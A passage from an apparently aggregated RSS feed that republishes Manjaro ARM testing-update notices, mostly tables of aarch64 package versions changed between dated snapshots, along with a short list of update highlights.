                                xpra              3.0.9-3              3.0.9-4
                              xxhash              0.7.4-1              0.8.0-1
                          youtube-dl       2020.06.16.1-2         2020.07.28-1
                      youtube-viewer            1:3.7.6-1            1:3.7.7-1
              yubikey-touch-detector              1.7.1-1              1.8.1-1
                                zart              2.9.1-2              2.9.1-3
                                 zig              0.6.0-1              0.6.0-2
                                zimg              2.9.3-1                3.0-1
                                zmap              2.1.1-7              2.1.1-8
                             crystal                    -             0.35.1-1
                          exfatprogs                    -              1.0.4-2
                   fcitx5-configtool                    -     0.0.0.20200809-1
                        feathernotes                    -              0.7.0-3
                                kmon                    -              1.4.0-1
             kxstudio-lv2-extensions                    -         2020.08.08-1
                             libavif                    -              0.8.1-2
                               libbf                    -         2020.01.19-1
                             libtpms                    -              0.7.3-2
                    lua53-alt-getopt                    -              0.7.0-9
                      lua53-argparse                    -              0.7.1-1
                       lua53-cqueues                    -           20200726-2
                           lua53-dbi                    -              0.7.2-2
                         lua53-expat                    -              1.3.0-5
                    lua53-filesystem                    -              1.8.0-3
                         lua53-mpack                    -              1.0.8-3
                      lua53-penlight                    -              1.6.0-2
                           lua53-sec                    -              2:0.9-2
                        lua53-socket                    -           20200329-1
                          manuskript                    -             0.11.0-1
                      podman-compose                    -              0.1.5-1
                                pqiv                    -               2.11-4
                         python-dask                    -             2.21.0-2
                  python-distributed                    -             2.22.0-1
                       python-fsspec                    -              0.8.0-1
                     python-heapdict                    -              1.0.1-1
                  python-itemloaders                    -              1.0.1-1
                      python-libusb1                    -                1.8-1
                         python-lmdb                    -               0.98-1
                       python-locket                    -              0.2.0-1
                       python-mocket                    -              3.8.7-1
                        python-partd                    -              1.1.0-1
       python-pipenv-to-requirements                    -              0.9.0-1
                         python-pook                    -              1.0.1-1
                         python-spur                    -             0.3.21-1
                         python-zict                    -              2.0.0-1
                              rclone                    -             1.52.3-1
                           scenarist                    -         0.7.2.rc9i-1
                              shards                    -             0.11.1-1
                            spotifyd                    -             0.2.24-2
                               swtpm                    -              0.3.3-1
                           symphytum                    -                2.6-2
                   ttf-sarasa-gothic                    -            0.12.11-1
                               yices                    -              2.6.2-1


:: Different overlay package(s) in repository core aarch64

-------------------------------------------------------------------------------
                             PACKAGE           2020-07-28          2020-08-13
-------------------------------------------------------------------------------
                       linux-aarch64             5.7.10-2                    -
               linux-aarch64-headers             5.7.10-2                    -
                   linux-pinebookpro              5.7.0-3                    -
           linux-pinebookpro-headers              5.7.0-3                    -
                     linux-pinephone             5.7.0-10             5.7.0-14
             linux-pinephone-headers             5.7.0-10             5.7.0-14
                            linux-rc            5.8.rc7-1            5.8.rc7-3
                    linux-rc-headers            5.8.rc7-1            5.8.rc7-3
                     manjaro-release              20.07-1              20.08-1
                   uboot-pinebookpro         2020.07rc5-1            2020.07-1
                        uboot-rock64            2020.04-2            2020.07-1
                       uboot-rockpi4            2020.04-1                    -
                               linux                    -              5.8.1-1
                       linux-headers                    -              5.8.1-1
                   linux56-pinephone                    -              5.6.0-6
           linux56-pinephone-headers                    -              5.6.0-6
                uboot-odroid-n2-plus                    -        2015.01.112-2
                      uboot-rockpi4b                    -            2020.07-2
                      uboot-rockpi4c                    -            2020.07-2


:: Different sync package(s) in repository core aarch64

-------------------------------------------------------------------------------
                             PACKAGE           2020-07-28          2020-08-13
-------------------------------------------------------------------------------
                     ca-certificates           20181109-3           20181109-4
             ca-certificates-mozilla               3.54-1               3.55-2
          ]]></content:encoded>
</item>
<item>
<title><![CDATA[[ARM Testing Update] 2020-08-11 - SystemD, Pamac, Plasma Frameworks and kernel]]></title>
<description><![CDATA[Hello ARM community.
Testing updates just keeps on coming!

Some highlights:

Our mainline kernel got updated
Added more KDE Git packages

Pamac updated to 9.5.7

SystemD updated to 246.1
Version 5.73.0 of Plasma Frameworks

Added uboot-odroid-n2-plus, so we can support the Odroid N2+ device soon...]]></description>
<link>https://tsecurity.de/de/1210178/unix-server/arm-testing-update-2020-08-11-systemd-pamac-plasma-frameworks-and-kernel/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1210178/unix-server/arm-testing-update-2020-08-11-systemd-pamac-plasma-frameworks-and-kernel/</guid>
<pubDate>Sat, 15 Aug 2020 14:48:33 +0200</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Hello ARM community.</p>
<p>Testing updates just keeps on coming!</p>
<hr>
<p><em>Some highlights:</em></p>
<ul>
<li>Our mainline <strong>kernel</strong> got updated</li>
<li>Added more <strong>KDE Git</strong> packages</li>
<li>
<strong>Pamac</strong> updated to 9.5.7</li>
<li>
<strong>SystemD</strong> updated to 246.1</li>
<li>Version 5.73.0 of <strong>Plasma Frameworks</strong>
</li>
<li>Added <code>uboot-odroid-n2-plus</code>, so we can support the <strong>Odroid N2+</strong> device soon</li>
<li>Some <strong>python</strong> packages got updated</li>
</ul>
<hr>
<p><strong>Upstream Notifications:</strong></p>
<details>
<summary>
Older notifications</summary>
<p>The <code>nss</code> package requires manual intervention:<br>
<a href="https://www.archlinux.org/news/nss3511-1-and-lib32-nss3511-1-updates-require-manual-intervention/" class="inline-onebox">Arch Linux - News: nss&gt;=3.51.1-1 and lib32-nss&gt;=3.51.1-1 updates require manual intervention</a><br>
The packages <code>hplip</code> and <code>firewalld</code> requires manual intervention:<br>
<a href="https://www.archlinux.org/news/hplip-3203-2-update-requires-manual-intervention/" class="inline-onebox">Arch Linux - News: hplip 3.20.3-2 update requires manual intervention</a><br>
<a href="https://www.archlinux.org/news/firewalld081-2-update-requires-manual-intervention/" class="inline-onebox">Arch Linux - News: firewalld&gt;=0.8.1-2 update requires manual intervention</a></p>
</details>
<hr>
<p><strong>Package Changes</strong> (Tue Aug 11 19:25:21 CEST 2020)</p>
<ul>
<li>arm-testing community aarch64:  413 new and 385 removed package(s)</li>
<li>arm-testing core aarch64:  9 new and 8 removed package(s)</li>
<li>arm-testing extra aarch64:  195 new and 239 removed package(s)</li>
</ul>
<pre><code class="lang-auto">:: Different overlay package(s) in repository community aarch64

-------------------------------------------------------------------------------
                             PACKAGE          2020-08-06         2020-08-11
-------------------------------------------------------------------------------
                          attica-git5.73.0.r759.gec1346b-15.74.0.r760.gf82c7f0-1
      ayatana-indicator-datetime-git          git_r2192-1          git_r2210-1
       ayatana-indicator-display-git       r233.ac2f7de-1       r238.fdda527-1
         ayatana-indicator-power-git          git_r1043-1          git_r1057-1
       ayatana-indicator-session-git          git_r2440-1          git_r2448-1
         ayatana-indicator-sound-git          git_r2735-1          git_r2741-1
                           baloo-git5.73.0.r2799.g5256817c-15.74.0.r2811.g4aa6306c-1
                        bluez-qt-git5.73.0.r601.g04c3770-15.74.0.r602.g792d6c0-1
                          breeze-git5.19.80.r2016.gfaa24ec4-15.19.80.r2020.ga75c986f-1
                      breeze-gtk-git5.19.80.r386.g84530ae-25.19.80.r390.g2158b47-1
                    breeze-icons-git5.73.0.r1611.g1b26fddf-15.74.0.r1616.g1b83272f-1
                               calls  0.1.7+11+gb95de5c-1  0.1.7+12+g6fe3639-4
                              chatty             0.1.13-1             0.1.14-1
                      deviceinfo-git        r33.544833a-2        r34.06e02d4-1
                        discover-git5.19.80.r7783.gdfef8bd0-15.19.80.r7787.gde8452b7-1
                     element-desktop              1.7.2-1              1.7.3-1
                         element-web              1.7.2-1              1.7.3-1
             extra-cmake-modules-git5.73.0.r3175.g6a278df-25.74.0.r3177.g17d053b-1
            frameworkintegration-git5.73.0.r529.g131b257-15.74.0.r530.g3825bf9-1
                     kactivities-git5.73.0.r1297.gabc603e5-15.74.0.r1298.g6123b94f-1
               kactivities-stats-git5.73.0.r291.g8c0de47-15.74.0.r295.gb6fdfb0-1
                         kapidox-git5.73.0.r481.gb3dff93-25.74.0.r483.g3af0ca6-1
                           kauth-git5.73.0.r368.g4960beb-25.74.0.r370.g80d8458-1
                      kbookmarks-git5.73.0.r346.g806c5ee-15.74.0.r348.g0d380a8-1
                        kcmutils-git5.73.0.r416.g1661327-15.74.0.r418.gdd5babd-1
                         kcodecs-git5.73.0.r317.g3c83f81-25.74.0.r319.gd251ab4-1
                     kcompletion-git5.73.0.r374.g46377c4-25.74.0.r376.g86566cc-1
                         kconfig-git5.73.0.r709.g7c96cf2-25.74.0.r713.g45d8532-1
                  kconfigwidgets-git5.73.0.r481.ge3bdcc2-25.74.0.r488.g8c452bf-1
                     kcoreaddons-git5.73.0.r1006.g614d986-25.74.0.r1013.gd918586-1
                          kcrash-git5.73.0.r324.g56207e6-15.74.0.r325.g310af9a-1
                     kdbusaddons-git5.73.0.r316.g37a2472-15.74.0.r317.gac665a3-1
                    kdeclarative-git5.73.0.r792.g9710a85-15.74.0.r795.gcb59f2a-1
                            kded-git5.73.0.r328.g78171db-15.74.0.r330.g07999d9-1
                 kdelibs4support-git5.73.0.r948.g8c5794ce-15.74.0.r949.g6726e5a8-1
                kdeplasma-addons-git5.19.80.r8369.g959bc0009-15.19.80.r8371.g17b30f399-1
                 kdesignerplugin-git5.73.0.r287.g28dbac9-15.74.0.r288.gd872bde-1
                           kdesu-git5.73.0.r405.g94f62e5-15.74.0.r407.g942eb3b-1
                       kdewebkit-git5.73.0.r235.g3c5eabf-15.74.0.r236.g78e68a7-1
                          kdnssd-git5.73.0.r263.g2ed2bf2-15.74.0.r264.g994e1de-1
                       kdoctools-git5.73.0.r548.g8265a67-25.74.0.r550.gd299beb-1
                      kemoticons-git5.73.0.r330.gc71fedc-15.74.0.r332.g0d40178-1
                   kfilemetadata-git5.73.0.r708.g11085b2-15.74.0.r710.g49ad124-1
                    kglobalaccel-git5.73.0.r374.ge4a1c04-15.74.0.r377.g24ca904-1
                      kguiaddons-git5.73.0.r295.g51a6566-25.74.0.r297.g3ab31e6-1
                       kholidays-git5.73.0.r875.g6494fad-15.74.0.r876.g561bc4e-1
                        khotkeys-git5.19.80.r2012.g8ba8a29-25.19.80.r2013.g40ae386-1
                           khtml-git5.73.0.r505.g572996a-15.74.0.r506.g269254d-1
                           ki18n-git5.73.0.r404.g1bc742e-25.74.0.r406.gb97a869-1
                     kiconthemes-git5.73.0.r436.ga368d8b-15.74.0.r438.gec53d0e-1
                       kidletime-git5.73.0.r257.gb48226a-15.74.0.r258.ga2bf6d5-1
                           kinit-git5.73.0.r353.g3283c63-15.74.0.r355.g441c8fb-1
                             kio-git5.73.0.r4118.g2c5a4b05-15.74.0.r4130.g6c836875-1
                       kirigami2-git5.73.0.r2282.gcdd107d8-15.74.0.r2344.g2d2c5fa9-1
                     kitemmodels-git5.73.0.r439.g52977f2-15.74.0.r440.g490e83e-1
                      kitemviews-git5.73.0.r277.g9e7d56e-15.74.0.r278.gde59802-1
                     kjobwidgets-git5.73.0.r308.gdceeae0-15.74.0.r309.g81e4da2-1
                             kjs-git5.73.0.r291.g4fe422e-15.74.0.r292.g56731d8-1
                        kjsembed-git5.73.0.r251.g0d570b6-15.74.0.r252.g26d2f70-1
                    kmediaplayer-git5.73.0.r245.gae6dee5-15.74.0.r246.gf07c9de-1
                       knewstuff-git5.73.0.r888.g3177e865-15.74.0.r897.g13524772-1
                  knotifications-git5.73.0.r554.ga4d0365-15.74.0.r556.g00f8d78-1
                   knotifyconfig-git5.73.0.r294.gc1c434c-15.74.0.r296.g1286618-1
                        kpackage-git5.73.0.r590.g09f1295-15.74.0.r592.gb77735b-1
                          kparts-git5.73.0.r425.g4915983-15.74.0.r427.g130f47a-1
                         kpeople-git5.73.0.r1262.g94a9ab3-15.74.0.r1264.gc94700e-1
                       kplotting-git5.73.0.r240.g8af4b7e-15.74.0.r241.g6a93a9f-1
                            kpty-git5.73.0.r269.gef60f2c-15.74.0.r270.g762a7ab-1
                           kross-git5.73.0.r286.ge4425ea-15.74.0.r287.g480a701-1
                         krunner-git5.73.0.r462.gf2aa0c2-15.74.0.r467.gf1f745a-1
                        kservice-git5.73.0.r788.g6d50845-15.74.0.r791.g6a43de4-1
                       ksysguard-git5.19.80.r3339.g0f75a31d-25.19.80.r3341.ga7d1b0d9-1
                     ktexteditor-git5.73.0.r2387.g1d3bdc56-15.74.0.r2402.g7f7ba270-1
                    ktextwidgets-git5.73.0.r332.g23bf2b3-15.74.0.r335.g4527a2d-1
                 kunitconversion-git5.73.0.r315.g174bfe0-15.74.0.r316.g1d7c830-1
                         kwallet-git5.73.0.r986.g49fd921-15.74.0.r988.g6462a94-1
                        kwayland-git5.73.0.r1020.ge62f07c-15.74.0.r1021.gb7ae090-1
                 kwayland-server-git5.19.80.r1098.gcccc77f-25.19.80.r1101.g11e6c10-1
                  kwidgetsaddons-git5.73.0.r699.gc5d6ea9-25.74.0.r701.g4d8a6fa-1
                            kwin-git5.19.80.r18205.gd4cd2b5a6-25.19.80.r18223.g2a9971fa0-1
                   kwindowsystem-git5.73.0.r524.gec0fcaa-15.74.0.r525.gd597633-1
                         kxmlgui-git5.73.0.r639.gfa94621-15.74.0.r642.g4b41ac4-1
                   kxmlrpcclient-git5.73.0.r404.g97440cf23-15.74.0.r406.g259a34804-1
            libayatana-indicator-git          git_r1878-1          git_r1894-1
                    libksysguard-git5.19.80.r1932.gdd4b581-25.19.80.r1935.g6dbd044-1
                maliit-framework-git     r1867.99e41962-2     r1873.223331b3-1
                 maliit-keyboard-git     r2034.99cd3f43-1     r2034.99cd3f43-2
                           milou-git5.19.80.r694.g84442e3-25.19.80.r697.g1cb6012-1
                 modemmanager-qt-git5.73.0.r464.gba214a2-15.74.0.r465.g13d1462-1
               networkmanager-qt-git5.73.0.r1059.g3bfa31d-15.74.0.r1060.g9276dfc-1
                          oxygen-git5.19.80.r4382.ga839eeee-25.19.80.r4384.g3cacbed8-1
                    oxygen-icons-git5.73.0.r234.g487252b-15.74.0.r235.gc77dbd9-1
                oxygen-icons-svg-git5.73.0.r234.g487252b-15.74.0.r235.gc77dbd9-1
                                phoc              0.4.1-3              0.4.2-2
                               phosh              0.4.3-2              0.4.3-4
            pinephone-manjaro-tweaks           20200805-1           20200811-1
             pinephone-modem-scripts               0.10-1               0.12-1
                plasma-framework-git5.73.0.r15508.g74de953ce-15.74.0.r15518.g3e225d866-1
                       plasma-nm-git5.19.80.r2915.g7f0652aa-15.19.80.r2916.g293e1b35-1
          plasma-wayland-session-git5.19.80.r9255.g45700b995-25.19.80.r9286.gdc70225a7-1
                plasma-workspace-git5.19.80.r9255.g45700b995-25.19.80.r9286.gdc70225a7-1
                      powerdevil-git5.19.80.r2331.ge94b5d60-25.19.80.r2333.g671da448-1
                          prison-git5.73.0.r265.g64076ec-15.74.0.r266.ge32d429-1
                         purpose-git5.73.0.r774.g2adc78b-15.74.0.r779.gd7c7837-1
              qqc2-desktop-style-git5.73.0.r378.g1b0e307-15.74.0.r380.gad2b24f-1
                rockpi4-post-install           20200305-1           20200807-1
              rockpro64-post-install           20200305-1           20200807-1
                        sddm-kcm-git5.19.80.r533.g388ea23-25.19.80.r534.g5f95108-1
                           solid-git5.73.0.r580.g0ac1bf3-25.74.0.r582.gab3ab0f-1
                          sonnet-git5.73.0.r541.g8e4b252-25.74.0.r543.ge2fecbc-1
                         squeekboard  1.9.2+30+g88821e2-1              1.9.3-2
                     syndication-git5.73.0.r775.g66aeed2-15.74.0.r778.gf96f120-1
             syntax-highlighting-git5.73.0.r1150.g0c8af347-15.74.0.r1173.g9c0872d0-1
                    threadweaver-git5.73.0.r449.g45079fa-15.74.0.r450.gf4d0d40-1
                           bitwarden                    -             1.20.1-1
                         drkonqi-git                    -5.19.80.r533.g12d1ff57-1
                        karchive-git                    -5.74.0.r431.g7403af3-1
                 kirigami-addons-git                    -        r19.a445f08-1
                      knetattach-git                    -5.19.80.r7802.gb2a8000bb-1
                         kscreen-git                    -5.19.80.r1266.g65f342d-2
            kwayland-integration-git                    -5.19.80.r146.g391b552-2
                                 nvm                    -             0.35.3-1
      plasma-browser-integration-git                    -5.19.80.r1125.g3d8f2dfd-1
                  plasma-desktop-git                    -5.19.80.r7802.gb2a8000bb-1
        plasma-wayland-protocols-git                    -1.1.1.r1018.g61b389b-1
                 spectral-matrix-git                    -  218.r637.gca91709-1
                    user-manager-git                    -5.19.80.r495.gc5daf9f-1
          xdg-desktop-portal-kde-git                    -5.19.80.r295.gc83f7c8-1


:: Different sync package(s) in repository community aarch64

-------------------------------------------------------------------------------
                             PACKAGE          2020-08-06         2020-08-11
-------------------------------------------------------------------------------
                      arch-wiki-lite           20190826-1           20200527-1
                             argbash              2.8.1-2              2.9.0-1
                             awesome                4.3-1                4.3-2
                              awxkit             13.0.0-1             14.0.0-1
                           benchmark              1.5.1-1              1.5.1-2
                             blender          17:2.83.4-1        17:2.83.4-1.1
                               blosc             1.19.0-1             1.20.0-1
                               bspwm              0.9.9-2             0.9.10-1
                                btfs               2.21-1               2.22-1
                         chrono-date 2.4.1+134+g9a0ee25-1              3.0.0-2
                              cobalt             0.16.1-1             0.16.2-1
                             cockpit                224-1                225-1
                   cockpit-dashboard                224-1                225-1
                      cockpit-docker                224-1                225-1
                    cockpit-machines                224-1                225-1
                         cockpit-pcp                224-1                225-1
                      cockpit-podman                 20-1                 21-1
                             corrade            2019.10-1            2020.06-1
                              coturn            4.5.1.3-1            4.5.1.3-2
                                dart              2.8.4-1              2.9.0-1
                             diffuse0.5.0alpha7+4+g813d6e7-3              0.5.0-1
                             dovecot           2.3.10.1-1           2.3.10.1-2
                             drumkv1             0.9.15-1             0.9.16-1
                           duplicity             0.8.12-1             0.8.15-1
                            easyjson              0.7.1-2              0.7.3-1
                      emacs-php-mode             1.19.1-4             1.23.0-1
                          emscripten            1.39.20-4             1.40.1-1
                                eric              20.04-1               20.6-1
                         eric-common              20.04-1                    -
                        eric-i18n-de              19.06-1               20.6-1
                        eric-i18n-en              19.06-1               20.6-1
                        eric-i18n-es              19.06-1               20.6-1
                        eric-i18n-ru              19.06-1               20.6-1
                              erlang               23.0-1             23.0.3-1
                          erlang-nox               23.0-1             23.0.3-1
                     erlang-unixodbc               23.0-1             23.0.3-1
                              fcitx5     0.0.0.20200803-1     0.0.0.20200810-1
                        fcitx5-anthy     0.0.0.20200728-1     0.0.0.20200728-2
                      fcitx5-chewing     0.0.0.20200728-1     0.0.0.20200728-2
               fcitx5-chinese-addons   0.0.0.20200803.1-1     0.0.0.20200807-1
                   fcitx5-configtool   0.0.0.20200803.1-1     0.0.0.20200809-1
                          fcitx5-gtk     0.0.0.20200607-2     0.0.0.20200607-3
                       fcitx5-hangul     0.0.0.20200728-1     0.0.0.20200728-2
                          fcitx5-lua     0.0.0.20200802-1     0.0.0.20200802-3
                           fcitx5-qt     0.0.0.20200803-1     0.0.0.20200809-1
                          fcitx5-skk     0.0.0.20200523-2     0.0.0.20200523-3
                       fcitx5-unikey     0.0.0.20200527-2     0.0.0.20200527-3
                      firefox-stylus             1.5.11-1             1.5.13-1
              firefox-tree-style-tab             3.5.19-1             3.5.21-1
                   firefox-tridactyl             1.19.1-1             1.20.0-1
               firefox-ublock-origin             1.28.4-1             1.29.0-1
                             fluxctl             1.19.0-2             1.20.1-1
                             fractal              4.2.2-2              4.4.0-1
                             freeciv              2.6.2-1              2.6.2-2
                          freeradius             3.0.21-3             3.0.21-4
                         gcompris-qt               0.97-1             0.97.1-1
                            gearmand            1.1.18-11            1.1.18-12
                             gendesk              1.0.5-2              1.0.6-1
                         geoipupdate              4.3.0-2              4.3.0-3
                            gitolite             3.6.11-2             3.6.12-1
                         gnome-boxes             3.36.5-1             3.36.6-1
                                  go           2:1.14.6-1           2:1.14.7-1
                               gpick           0.2.6rc1-7           0.2.6rc1-8
                              grafx2                2.7-2                2.7-3
                                grim              1.3.0-1              1.3.1-1
                     gtk-layer-shell              0.1.0-2              0.2.0-1
                            gvm-libs             10.0.1-2             10.0.2-1
                              hamlib                3.3-7                3.3-8
                             haproxy              2.2.1-1              2.2.2-1
                             hexchat             2.14.3-2             2.14.3-3
                                 hey              0.1.3-3              0.1.4-1
                           highlight               3.57-1               3.57-2
                       highlight-gui               3.57-1               3.57-2
                             hiredis             0.14.1-1              1.0.0-1
                                hugo             0.74.1-1             0.74.3-1
                             i3-gaps             4.18.2-1             4.18.2-2
                      ibus-libpinyin             1.11.1-4             1.11.1-5
                             icecast              2.4.4-1              2.4.4-3
                              icmake            9.02.09-1            9.03.01-1
                          jack-stdio                1.5-2                1.6-1
                                josm              16731-1              16812-1
                    jupyter-notebook              6.0.3-1              6.1.1-1
                          jupyterlab              2.2.2-1              2.2.4-1
                         kvantum-qt5             0.16.0-1             0.16.1-1
                                ldoc              1.4.6-2              1.4.6-3
                           leiningen              2.9.3-1              2.9.4-2
                              lhapdf              6.2.3-6              6.3.0-1
                            libffado              2.4.3-1              2.4.4-1
                              libime     0.0.0.20200716-1     0.0.0.20200807-1
                        libmaxminddb              1.4.2-1              1.4.3-1
                        libquicktime             1.2.4-22             1.2.4-23
                 libretro-beetle-psx               2354-1               2360-1
              libretro-beetle-psx-hw               2354-1               2360-1
                  libretro-core-info              1.8.9-1              1.9.0-1
                       libretro-mgba               6762-1               6814-1
                       libretro-play               5758-1               5769-1
              libretro-shaders-slang                764-1                765-1
                     libretro-snes9x               1774-1               1776-1
                             librime           1:1.5.3-10           1:1.5.3-11
                           libsigrok              0.5.2-4              0.5.2-5
                           limesuite            20.01.0-3            20.07.0-1
                             liteide               37.1-1               37.2-2
                                lmms              1.2.1-3              1.2.2-1
                            lollypop              1.3.2-1              1.3.3-1
                      lua-alt-getopt              0.7.0-8                    -
                        lua-argparse              0.7.0-1              0.7.1-1
                         lua-cqueues           20200603-1           20200726-2
                             lua-dbi              0.7.2-1              0.7.2-2
                           lua-expat              1.3.0-4              1.3.0-5
                      lua-filesystem              1.8.0-1              1.8.0-3
                           lua-mpack              1.0.8-1              1.0.8-3
                        lua-penlight              1.6.0-1              1.6.0-2
                            lua-sdl22.0.5.6.0.r16.g272a748-1          2.0.5.6.0-3
                             lua-sec              2:0.9-1              2:0.9-2
                          lua-socket           20190219-1           20200329-1
                    lua51-alt-getopt              0.7.0-8              0.7.0-9
                      lua51-argparse              0.7.0-1              0.7.1-1
                       lua51-cqueues           20200603-1           20200726-2
                           lua51-dbi              0.7.2-1              0.7.2-2
                         lua51-expat              1.3.0-4              1.3.0-5
                    lua51-filesystem              1.8.0-1              1.8.0-3
                         lua51-mpack              1.0.8-1              1.0.8-3
                           lua51-sec              2:0.9-1              2:0.9-2
                        lua51-socket           20190219-1           20200329-1
                    lua52-alt-getopt              0.7.0-8              0.7.0-9
                      lua52-argparse              0.7.0-1              0.7.1-1
                       lua52-cqueues           20200603-1           20200726-2
                           lua52-dbi              0.7.2-1              0.7.2-2
                         lua52-expat              1.3.0-4              1.3.0-5
                    lua52-filesystem              1.8.0-1              1.8.0-3
                         lua52-mpack              1.0.8-1              1.0.8-3
                           lua52-sec              2:0.9-1              2:0.9-2
                        lua52-socket           20190219-1           20200329-1
                              luakit                2.1-3                2.2-1
                            luarocks              3.3.1-1              3.3.1-2
                                 lxc            1:4.0.3-1            1:4.0.4-1
                              magnum            2019.10-1            2020.06-1
                      magnum-plugins            2019.10-1            2020.06-1
                            minetest              5.3.0-1              5.3.0-2
                     minetest-common              5.3.0-1              5.3.0-2
                     minetest-server              5.3.0-1              5.3.0-2
                            minikube             1.11.0-2             1.12.2-1
                               minio         2020.05.16-1         2020.08.08-1
                          mmdblookup              1.4.2-1              1.4.3-1
                               mruby              2.1.1-1              2.1.2-1
                           musescore              3.4.2-1                3.5-1
                             neomutt           20200626-1           20200626-2
                              neovim              0.4.3-3              0.4.4-1
                             netdata             1.23.2-2             1.24.0-1
                       nlohmann-json              3.9.0-1              3.9.1-1
                              nomacs         1:3.16.224-3        1:3.17.2045-1
                              notion            1:4.0.1-1            1:4.0.1-2
                   npm-check-updates              7.0.2-1              7.0.4-1
                              octave              5.2.0-4              5.2.0-5
                             openttd             1.10.2-1             1.10.3-1
                                osmo              0.4.2-4              0.4.4-1
                              packer              1.6.0-2              1.6.1-1
                             padthv1             0.9.15-1             0.9.16-1
                                 pcp              5.1.1-2              5.2.0-1
                              pd-lua                0.9-2             0.10.1-1
                            pdf2djvu             0.9.17-4           0.9.17.1-1
                               peony              2.2.0-2              3.0.1-1
                perl-module-scandeps               1.27-3               1.28-1
                     perl-test-fatal              0.014-6              0.016-1
                    perl-test-simple           1.302175-2           1.302177-1
                    perl-test2-suite           0.000130-2           0.000132-1
                        php-igbinary              3.1.3-1              3.1.4-1
                               picom                  8-2                  8-3
                              pifpaf              2.5.0-1              2.6.0-1
     plasma5-applets-thermal-monitor              1.2.9-3              1.3.0-1
                           playerctl              2.1.1-1              2.2.1-1
                              podofo              0.9.6-2              0.9.6-3
                              polyml                5.8-2              5.8.1-1
                              pylama              7.7.1-3              7.7.1-4
                        python-arrow             0.15.7-1             0.15.8-1
                     python-cfn-lint             0.34.0-1             0.34.1-1
                         python-cmd2              1.3.0-1              1.3.2-1
                  python-distributed             2.21.0-1             2.22.0-1
            python-django-extensions              3.0.3-1              3.0.4-1
        python-django-rest-framework             3.11.0-3             3.11.1-1
                         python-dkim              1.0.4-1              1.0.5-1
                       python-docker              4.2.2-1              4.3.0-1
                python-dogpile.cache              1.0.1-1              1.0.2-1
                      python-etesync             0.11.1-2             0.12.0-1
                     python-eventlet             0.26.0-1             0.26.1-1
                       python-fsspec              0.7.4-2              0.8.0-1
              python-google-api-core             1.20.0-1             1.22.0-1
     python-google-api-python-client              1.9.3-1             1.10.0-1
                  python-google-auth             1.20.0-1             1.20.1-1
                   python-hypothesis            5.23.11-1             5.24.0-1
                        python-ldap3                2.7-2                2.8-1
                       python-libcst              0.3.8-1              0.3.9-1
                         python-lupa                1.9-1                1.9-2
                          python-mss              5.0.0-1              6.0.0-1
                  python-mysqlclient              2.0.0-1              2.0.1-1
                     python-openmdao              3.2.0-1              3.2.1-1
                       python-pandas              1.0.5-1              1.1.0-1
                        python-parso              0.7.1-1              0.8.0-1
                     python-pdfminer           20200720-1           20200726-1
                       python-pg8000             1.16.3-1             1.16.5-1
                    python-pip-shims              0.5.2-1              0.5.3-1
               python-prompt_toolkit              3.0.5-1              3.0.6-1
                       python-psutil              5.7.1-1              5.7.2-1
                 python-pyscreenshot                1.0-1                2.2-1
                       python-pytest              5.4.3-1              6.0.1-1
                        python-qiniu              7.2.8-1              7.2.9-1
                    python-reportlab             3.5.46-1             3.5.47-1
                python-requests-file              1.4.3-5              1.5.1-1
                       python-schema              0.7.2-1              0.7.3-1
                       python-sphinx              3.1.2-1              3.2.0-1
                        python-sybil              1.3.1-1              1.4.0-1
                        python-sympy              1.6.1-1              1.6.2-1
                   python-tldextract              2.2.2-1              2.2.3-1
                          python-tox             3.18.1-1             3.19.0-1
                        python-ujson              3.0.0-1              3.1.0-1
               python-update-checker               0.17-1             0.18.0-1
                   python-urwidtrees              1.0.2-5              1.0.3-2
                   python-validators             0.15.0-1             0.16.0-1
                   python-xlsxwriter              1.2.9-1              1.3.2-1
                       python-xxhash              1.4.4-1              2.0.0-1
                       python-yaspin             0.18.0-1              1.0.0-1
                      python2-psutil              5.7.1-1              5.7.2-1
                         python2-tox             3.18.1-1             3.19.0-1
                                qgis             3.12.3-2             3.14.1-1
                            qtractor             0.9.15-1             0.9.16-1
                            range-v3             0.10.0-2             0.11.0-1
                        rdiff-backup              2.0.3-1              2.0.5-1
                              remake       4.2.1+dbg1.4-3         4.3+dbg1.5-1
                           retroarch              1.8.9-1              1.9.0-1
              retroarch-assets-ozone              1:325-1              1:327-1
                retroarch-assets-xmb              1:325-1              1:327-1
                           rpm-tools             4.15.1-2             4.15.1-3
                                runc          1.0.0rc91-1          1.0.0rc92-1
                       rust-analyzer           20200803-1           20200810-1
                           s3fs-fuse               1.86-1               1.87-1
                             samplv1             0.9.15-1             0.9.16-1
                         sc3-plugins             3.10.0-3             3.10.0-4
                           screenkey                1.1-2                1.2-1
                               sfizz              0.3.2-1              0.4.0-1
                            sonic-pi              3.2.2-1              3.2.2-2
                              spdlog              1.7.0-1              1.7.0-2
                                 stk              4.6.1-2              4.6.1-3
                         sweethome3d                6.3-1                6.4-1
           switchboard-plug-keyboard              2.3.6-1              2.4.0-1
                               sxhkd              0.6.1-2              0.6.2-1
                             synthv1             0.9.15-1             0.9.16-1
                            texworks              0.6.5-2              0.6.5-3
                               tiled              1.4.1-2              1.4.2-1
                                 tor            0.4.3.5-2            0.4.3.6-1
                             traefik              2.2.1-2              2.2.2-1
                ukui-session-manager              2.0.3-1              3.0.0-1
                             unbound             1.11.0-1             1.11.0-2
                                 urh              2.8.8-1              2.8.8-2
                               v2ray             4.26.0-1             4.27.0-1
         v2ray-domain-list-community     20200804121222-1     20200810224036-1
                         vapoursynth                R50-1                R51-1
          vapoursynth-plugin-deblock                  6-2                6.1-1
                             vicious              2.3.3-1              2.4.1-2
                        vim-nerdtree              6.9.2-1              6.9.4-1
                                 vis                0.6-1                0.6-2
                                wabt             1.0.17-1             1.0.19-1
                              waybar              0.9.2-3              0.9.3-3
                             weechat                2.9-1                2.9-2
      wingpanel-indicator-nightlight              2.0.3-1              2.0.4-1
           wingpanel-indicator-sound              2.1.5-1              2.1.6-1
                         x42-plugins           20200714-2           20200714-3
                                xaos                4.0-1                4.1-1
                          xcb-imdkit     0.0.0.20200802-1     0.0.0.20200808-1
                                xpra              3.0.9-3              3.0.9-4
                                zimg              2.9.3-1                3.0-1
                                zmap              2.1.1-7              2.1.1-8
                             crystal                    -             0.35.1-1
             kxstudio-lv2-extensions                    -         2020.08.08-1
                             libavif                    -              0.8.1-2
                    lua53-alt-getopt                    -              0.7.0-9
                      lua53-argparse                    -              0.7.1-1
                       lua53-cqueues                    -           20200726-2
                           lua53-dbi                    -              0.7.2-2
                         lua53-expat                    -              1.3.0-5
